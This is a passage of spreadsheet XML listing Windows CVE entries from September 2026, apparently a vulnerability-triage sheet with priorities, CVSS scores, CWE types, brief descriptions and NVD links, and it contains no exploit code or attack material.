          <t>Use after free in Windows Device Association Service allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="M3175" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69296</t>
        </is>
      </c>
    </row>
    <row r="3176">
      <c r="A3176" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3176" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69305</t>
        </is>
      </c>
      <c r="C3176" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3176" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3176" s="5" t="inlineStr"/>
      <c r="F3176" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="G3176" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows</t>
        </is>
      </c>
      <c r="H3176" s="5" t="inlineStr"/>
      <c r="I3176" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J3176" s="5" t="inlineStr"/>
      <c r="K3176" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L3176" s="5" t="inlineStr">
        <is>
          <t>Use after free in Microsoft Windows Search Component allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="M3176" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69305</t>
        </is>
      </c>
    </row>
    <row r="3177">
      <c r="A3177" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3177" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69313</t>
        </is>
      </c>
      <c r="C3177" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3177" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3177" s="5" t="inlineStr"/>
      <c r="F3177" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G3177" s="5" t="inlineStr">
        <is>
          <t>microsoft</t>
        </is>
      </c>
      <c r="H3177" s="5" t="inlineStr"/>
      <c r="I3177" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J3177" s="5" t="inlineStr"/>
      <c r="K3177" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L3177" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Microsoft Standard XPS allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="M3177" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69313</t>
        </is>
      </c>
    </row>
    <row r="3178">
      <c r="A3178" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3178" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69314</t>
        </is>
      </c>
      <c r="C3178" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3178" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3178" s="5" t="inlineStr"/>
      <c r="F3178" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G3178" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H3178" s="5" t="inlineStr"/>
      <c r="I3178" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J3178" s="5" t="inlineStr"/>
      <c r="K3178" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L3178" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Device Association Broker service allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="M3178" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69314</t>
        </is>
      </c>
    </row>
    <row r="3179">
      <c r="A3179" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3179" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69336</t>
        </is>
      </c>
      <c r="C3179" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3179" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3179" s="5" t="inlineStr"/>
      <c r="F3179" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G3179" s="5" t="inlineStr">
        <is>
          <t>microsoft</t>
        </is>
      </c>
      <c r="H3179" s="5" t="inlineStr"/>
      <c r="I3179" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J3179" s="5" t="inlineStr"/>
      <c r="K3179" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L3179" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Microsoft Standard XPS allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="M3179" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69336</t>
        </is>
      </c>
    </row>
    <row r="3180">
      <c r="A3180" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3180" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69337</t>
        </is>
      </c>
      <c r="C3180" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3180" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3180" s="5" t="inlineStr"/>
      <c r="F3180" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="G3180" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H3180" s="5" t="inlineStr"/>
      <c r="I3180" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J3180" s="5" t="inlineStr"/>
      <c r="K3180" s="5" t="inlineStr">
        <is>
          <t>CWE-415</t>
        </is>
      </c>
      <c r="L3180" s="5" t="inlineStr">
        <is>
          <t>Double free in Windows Registry allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="M3180" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69337</t>
        </is>
      </c>
    </row>
    <row r="3181">
      <c r="A3181" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3181" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69338</t>
        </is>
      </c>
      <c r="C3181" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3181" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3181" s="5" t="inlineStr"/>
      <c r="F3181" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G3181" s="5" t="inlineStr"/>
      <c r="H3181" s="5" t="inlineStr"/>
      <c r="I3181" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J3181" s="5" t="inlineStr"/>
      <c r="K3181" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L3181" s="5" t="inlineStr">
        <is>
          <t>Use after free in Remote Desktop Gateway Service allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="M3181" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69338</t>
        </is>
      </c>
    </row>
    <row r="3182">
      <c r="A3182" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3182" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69340</t>
        </is>
      </c>
      <c r="C3182" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3182" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3182" s="5" t="inlineStr"/>
      <c r="F3182" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G3182" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H3182" s="5" t="inlineStr"/>
      <c r="I3182" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J3182" s="5" t="inlineStr"/>
      <c r="K3182" s="5" t="inlineStr">
        <is>
          <t>CWE-122, CWE-125</t>
        </is>
      </c>
      <c r="L3182" s="5" t="inlineStr">
        <is>
          <t>Heap-based</t>
        </is>
      </c>
      <c r="M3182" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69340</t>
        </is>
      </c>
    </row>
    <row r="3183">
      <c r="A3183" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3183" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69357</t>
        </is>
      </c>
      <c r="C3183" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3183" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3183" s="5" t="inlineStr"/>
      <c r="F3183" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G3183" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H3183" s="5" t="inlineStr"/>
      <c r="I3183" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J3183" s="5" t="inlineStr"/>
      <c r="K3183" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L3183" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows NDIS allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="M3183" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69357</t>
        </is>
      </c>
    </row>
    <row r="3184">
      <c r="A3184" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3184" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69358</t>
        </is>
      </c>
      <c r="C3184" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3184" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3184" s="5" t="inlineStr"/>
      <c r="F3184" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G3184" s="5" t="inlineStr"/>
      <c r="H3184" s="5" t="inlineStr"/>
      <c r="I3184" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J3184" s="5" t="inlineStr"/>
      <c r="K3184" s="5" t="inlineStr">
        <is>
          <t>CWE-908</t>
        </is>
      </c>
      <c r="L3184" s="5" t="inlineStr">
        <is>
          <t>Use of uninitialized resource in Remote Desktop Client allows an authorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="M3184" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69358</t>
        </is>
      </c>
    </row>
    <row r="3185">
      <c r="A3185" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3185" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69364</t>
        </is>
      </c>
      <c r="C3185" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3185" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3185" s="5" t="inlineStr"/>
      <c r="F3185" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G3185" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H3185" s="5" t="inlineStr"/>
      <c r="I3185" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J3185" s="5" t="inlineStr"/>
      <c r="K3185" s="5" t="inlineStr">
        <is>
          <t>CWE-362, CWE-416</t>
        </is>
      </c>
      <c r="L3185" s="5" t="inlineStr">
        <is>
          <t>Concurrent execution using shared resource with improper synchronization ('race condition') in Windows Print Spooler Components allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="M3185" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69364</t>
        </is>
      </c>
    </row>
    <row r="3186">
      <c r="A3186" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3186" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69366</t>
        </is>
      </c>
      <c r="C3186" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3186" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3186" s="5" t="inlineStr"/>
      <c r="F3186" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="G3186" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H3186" s="5" t="inlineStr"/>
      <c r="I3186" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J3186" s="5" t="inlineStr"/>
      <c r="K3186" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L3186" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Kernel allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="M3186" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69366</t>
        </is>
      </c>
    </row>
    <row r="3187">
      <c r="A3187" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3187" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69384</t>
        </is>
      </c>
      <c r="C3187" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3187" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3187" s="5" t="inlineStr"/>
      <c r="F3187" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G3187" s="5" t="inlineStr"/>
      <c r="H3187" s="5" t="inlineStr"/>
      <c r="I3187" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J3187" s="5" t="inlineStr"/>
      <c r="K3187" s="5" t="inlineStr">
        <is>
          <t>CWE-476</t>
        </is>
      </c>
      <c r="L3187" s="5" t="inlineStr">
        <is>
          <t>Null pointer dereference in Virtual Hard Disk (VHD) Miniport Driver allows an unauthorized attacker to deny service locally.</t>
        </is>
      </c>
      <c r="M3187" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69384</t>
        </is>
      </c>
    </row>
    <row r="3188">
      <c r="A3188" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3188" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69396</t>
        </is>
      </c>
      <c r="C3188" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3188" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3188" s="5" t="inlineStr"/>
      <c r="F3188" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G3188" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H3188" s="5" t="inlineStr"/>
      <c r="I3188" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J3188" s="5" t="inlineStr"/>
      <c r="K3188" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L3188" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows NDIS allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="M3188" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69396</t>
        </is>
      </c>
    </row>
    <row r="3189">
      <c r="A3189" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3189" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69451</t>
        </is>
      </c>
      <c r="C3189" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3189" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3189" s="5" t="inlineStr"/>
      <c r="F3189" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="G3189" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H3189" s="5" t="inlineStr"/>
      <c r="I3189" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J3189" s="5" t="inlineStr"/>
      <c r="K3189" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L3189" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Management Instrumentation allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="M3189" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69451</t>
        </is>
      </c>
    </row>
    <row r="3190">
      <c r="A3190" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3190" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69460</t>
        </is>
      </c>
      <c r="C3190" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3190" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3190" s="5" t="inlineStr"/>
      <c r="F3190" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G3190" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H3190" s="5" t="inlineStr"/>
      <c r="I3190" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J3190" s="5" t="inlineStr"/>
      <c r="K3190" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L3190" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Modern Device Management (MDM) allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="M3190" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69460</t>
        </is>
      </c>
    </row>
    <row r="3191">
      <c r="A3191" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3191" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69482</t>
        </is>
      </c>
      <c r="C3191" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3191" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3191" s="5" t="inlineStr"/>
      <c r="F3191" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G3191" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H3191" s="5" t="inlineStr"/>
      <c r="I3191" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J3191" s="5" t="inlineStr"/>
      <c r="K3191" s="5" t="inlineStr">
        <is>
          <t>CWE-379</t>
        </is>
      </c>
      <c r="L3191" s="5" t="inlineStr">
        <is>
          <t>Creation of temporary file in directory with insecure permissions in Windows Error Reporting allows an authorized attacker to perform tampering locally.</t>
        </is>
      </c>
      <c r="M3191" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69482</t>
        </is>
      </c>
    </row>
    <row r="3192">
      <c r="A3192" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3192" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69536</t>
        </is>
      </c>
      <c r="C3192" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3192" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3192" s="5" t="inlineStr"/>
      <c r="F3192" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G3192" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H3192" s="5" t="inlineStr"/>
      <c r="I3192" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J3192" s="5" t="inlineStr"/>
      <c r="K3192" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L3192" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Remote Desktop Services allows an authorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="M3192" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69536</t>
        </is>
      </c>
    </row>
    <row r="3193">
      <c r="A3193" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3193" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69553</t>
        </is>
      </c>
      <c r="C3193" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3193" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3193" s="5" t="inlineStr"/>
      <c r="F3193" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G3193" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H3193" s="5" t="inlineStr"/>
      <c r="I3193" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J3193" s="5" t="inlineStr"/>
      <c r="K3193" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="L3193" s="5" t="inlineStr">
        <is>
          <t>Missing authorization in Windows Hyper-V allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="M3193" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69553</t>
        </is>
      </c>
    </row>
    <row r="3194">
      <c r="A3194" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3194" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69597</t>
        </is>
      </c>
      <c r="C3194" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3194" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3194" s="5" t="inlineStr"/>
      <c r="F3194" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="G3194" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H3194" s="5" t="inlineStr"/>
      <c r="I3194" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J3194" s="5" t="inlineStr"/>
      <c r="K3194" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L3194" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows HTTP.sys allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="M3194" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69597</t>
        </is>
      </c>
    </row>
    <row r="3195">
      <c r="A3195" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3195" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69602</t>
        </is>
      </c>
      <c r="C3195" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3195" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3195" s="5" t="inlineStr"/>
      <c r="F3195" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="G3195" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H3195" s="5" t="inlineStr"/>
      <c r="I3195" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J3195" s="5" t="inlineStr"/>
      <c r="K3195" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L3195" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows PrintWorkflowUserSvc allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="M3195" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69602</t>
        </is>
      </c>
    </row>
    <row r="3196">
      <c r="A3196" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3196" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69688</t>
        </is>
      </c>
      <c r="C3196" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3196" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3196" s="5" t="inlineStr"/>
      <c r="F3196" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="G3196" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H3196" s="5" t="inlineStr"/>
      <c r="I3196" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J3196" s="5" t="inlineStr"/>
      <c r="K3196" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L3196" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Encrypting File System (EFS) allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="M3196" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69688</t>
        </is>
      </c>
    </row>
    <row r="3197">
      <c r="A3197" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3197" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69706</t>
        </is>
      </c>
      <c r="C3197" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3197" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3197" s="5" t="inlineStr"/>
      <c r="F3197" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G3197" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H3197" s="5" t="inlineStr"/>
      <c r="I3197" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J3197" s="5" t="inlineStr"/>
      <c r="K3197" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L3197" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Win32K allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="M3197" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69706</t>
        </is>
      </c>
    </row>
    <row r="3198">
      <c r="A3198" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3198" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69757</t>
        </is>
      </c>
      <c r="C3198" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3198" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3198" s="5" t="inlineStr"/>
      <c r="F3198" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="G3198" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H3198" s="5" t="inlineStr"/>
      <c r="I3198" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J3198" s="5" t="inlineStr"/>
      <c r="K3198" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L3198" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows TCP/IP allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="M3198" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69757</t>
        </is>
      </c>
    </row>
    <row r="3199">
      <c r="A3199" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3199" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69761</t>
        </is>
      </c>
      <c r="C3199" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3199" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3199" s="5" t="inlineStr"/>
      <c r="F3199" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G3199" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H3199" s="5" t="inlineStr"/>
      <c r="I3199" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J3199" s="5" t="inlineStr"/>
      <c r="K3199" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L3199" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows TCP/IP allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="M3199" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69761</t>
        </is>
      </c>
    </row>
    <row r="3200">
      <c r="A3200" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3200" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69775</t>
        </is>
      </c>
      <c r="C3200" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3200" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3200" s="5" t="inlineStr"/>
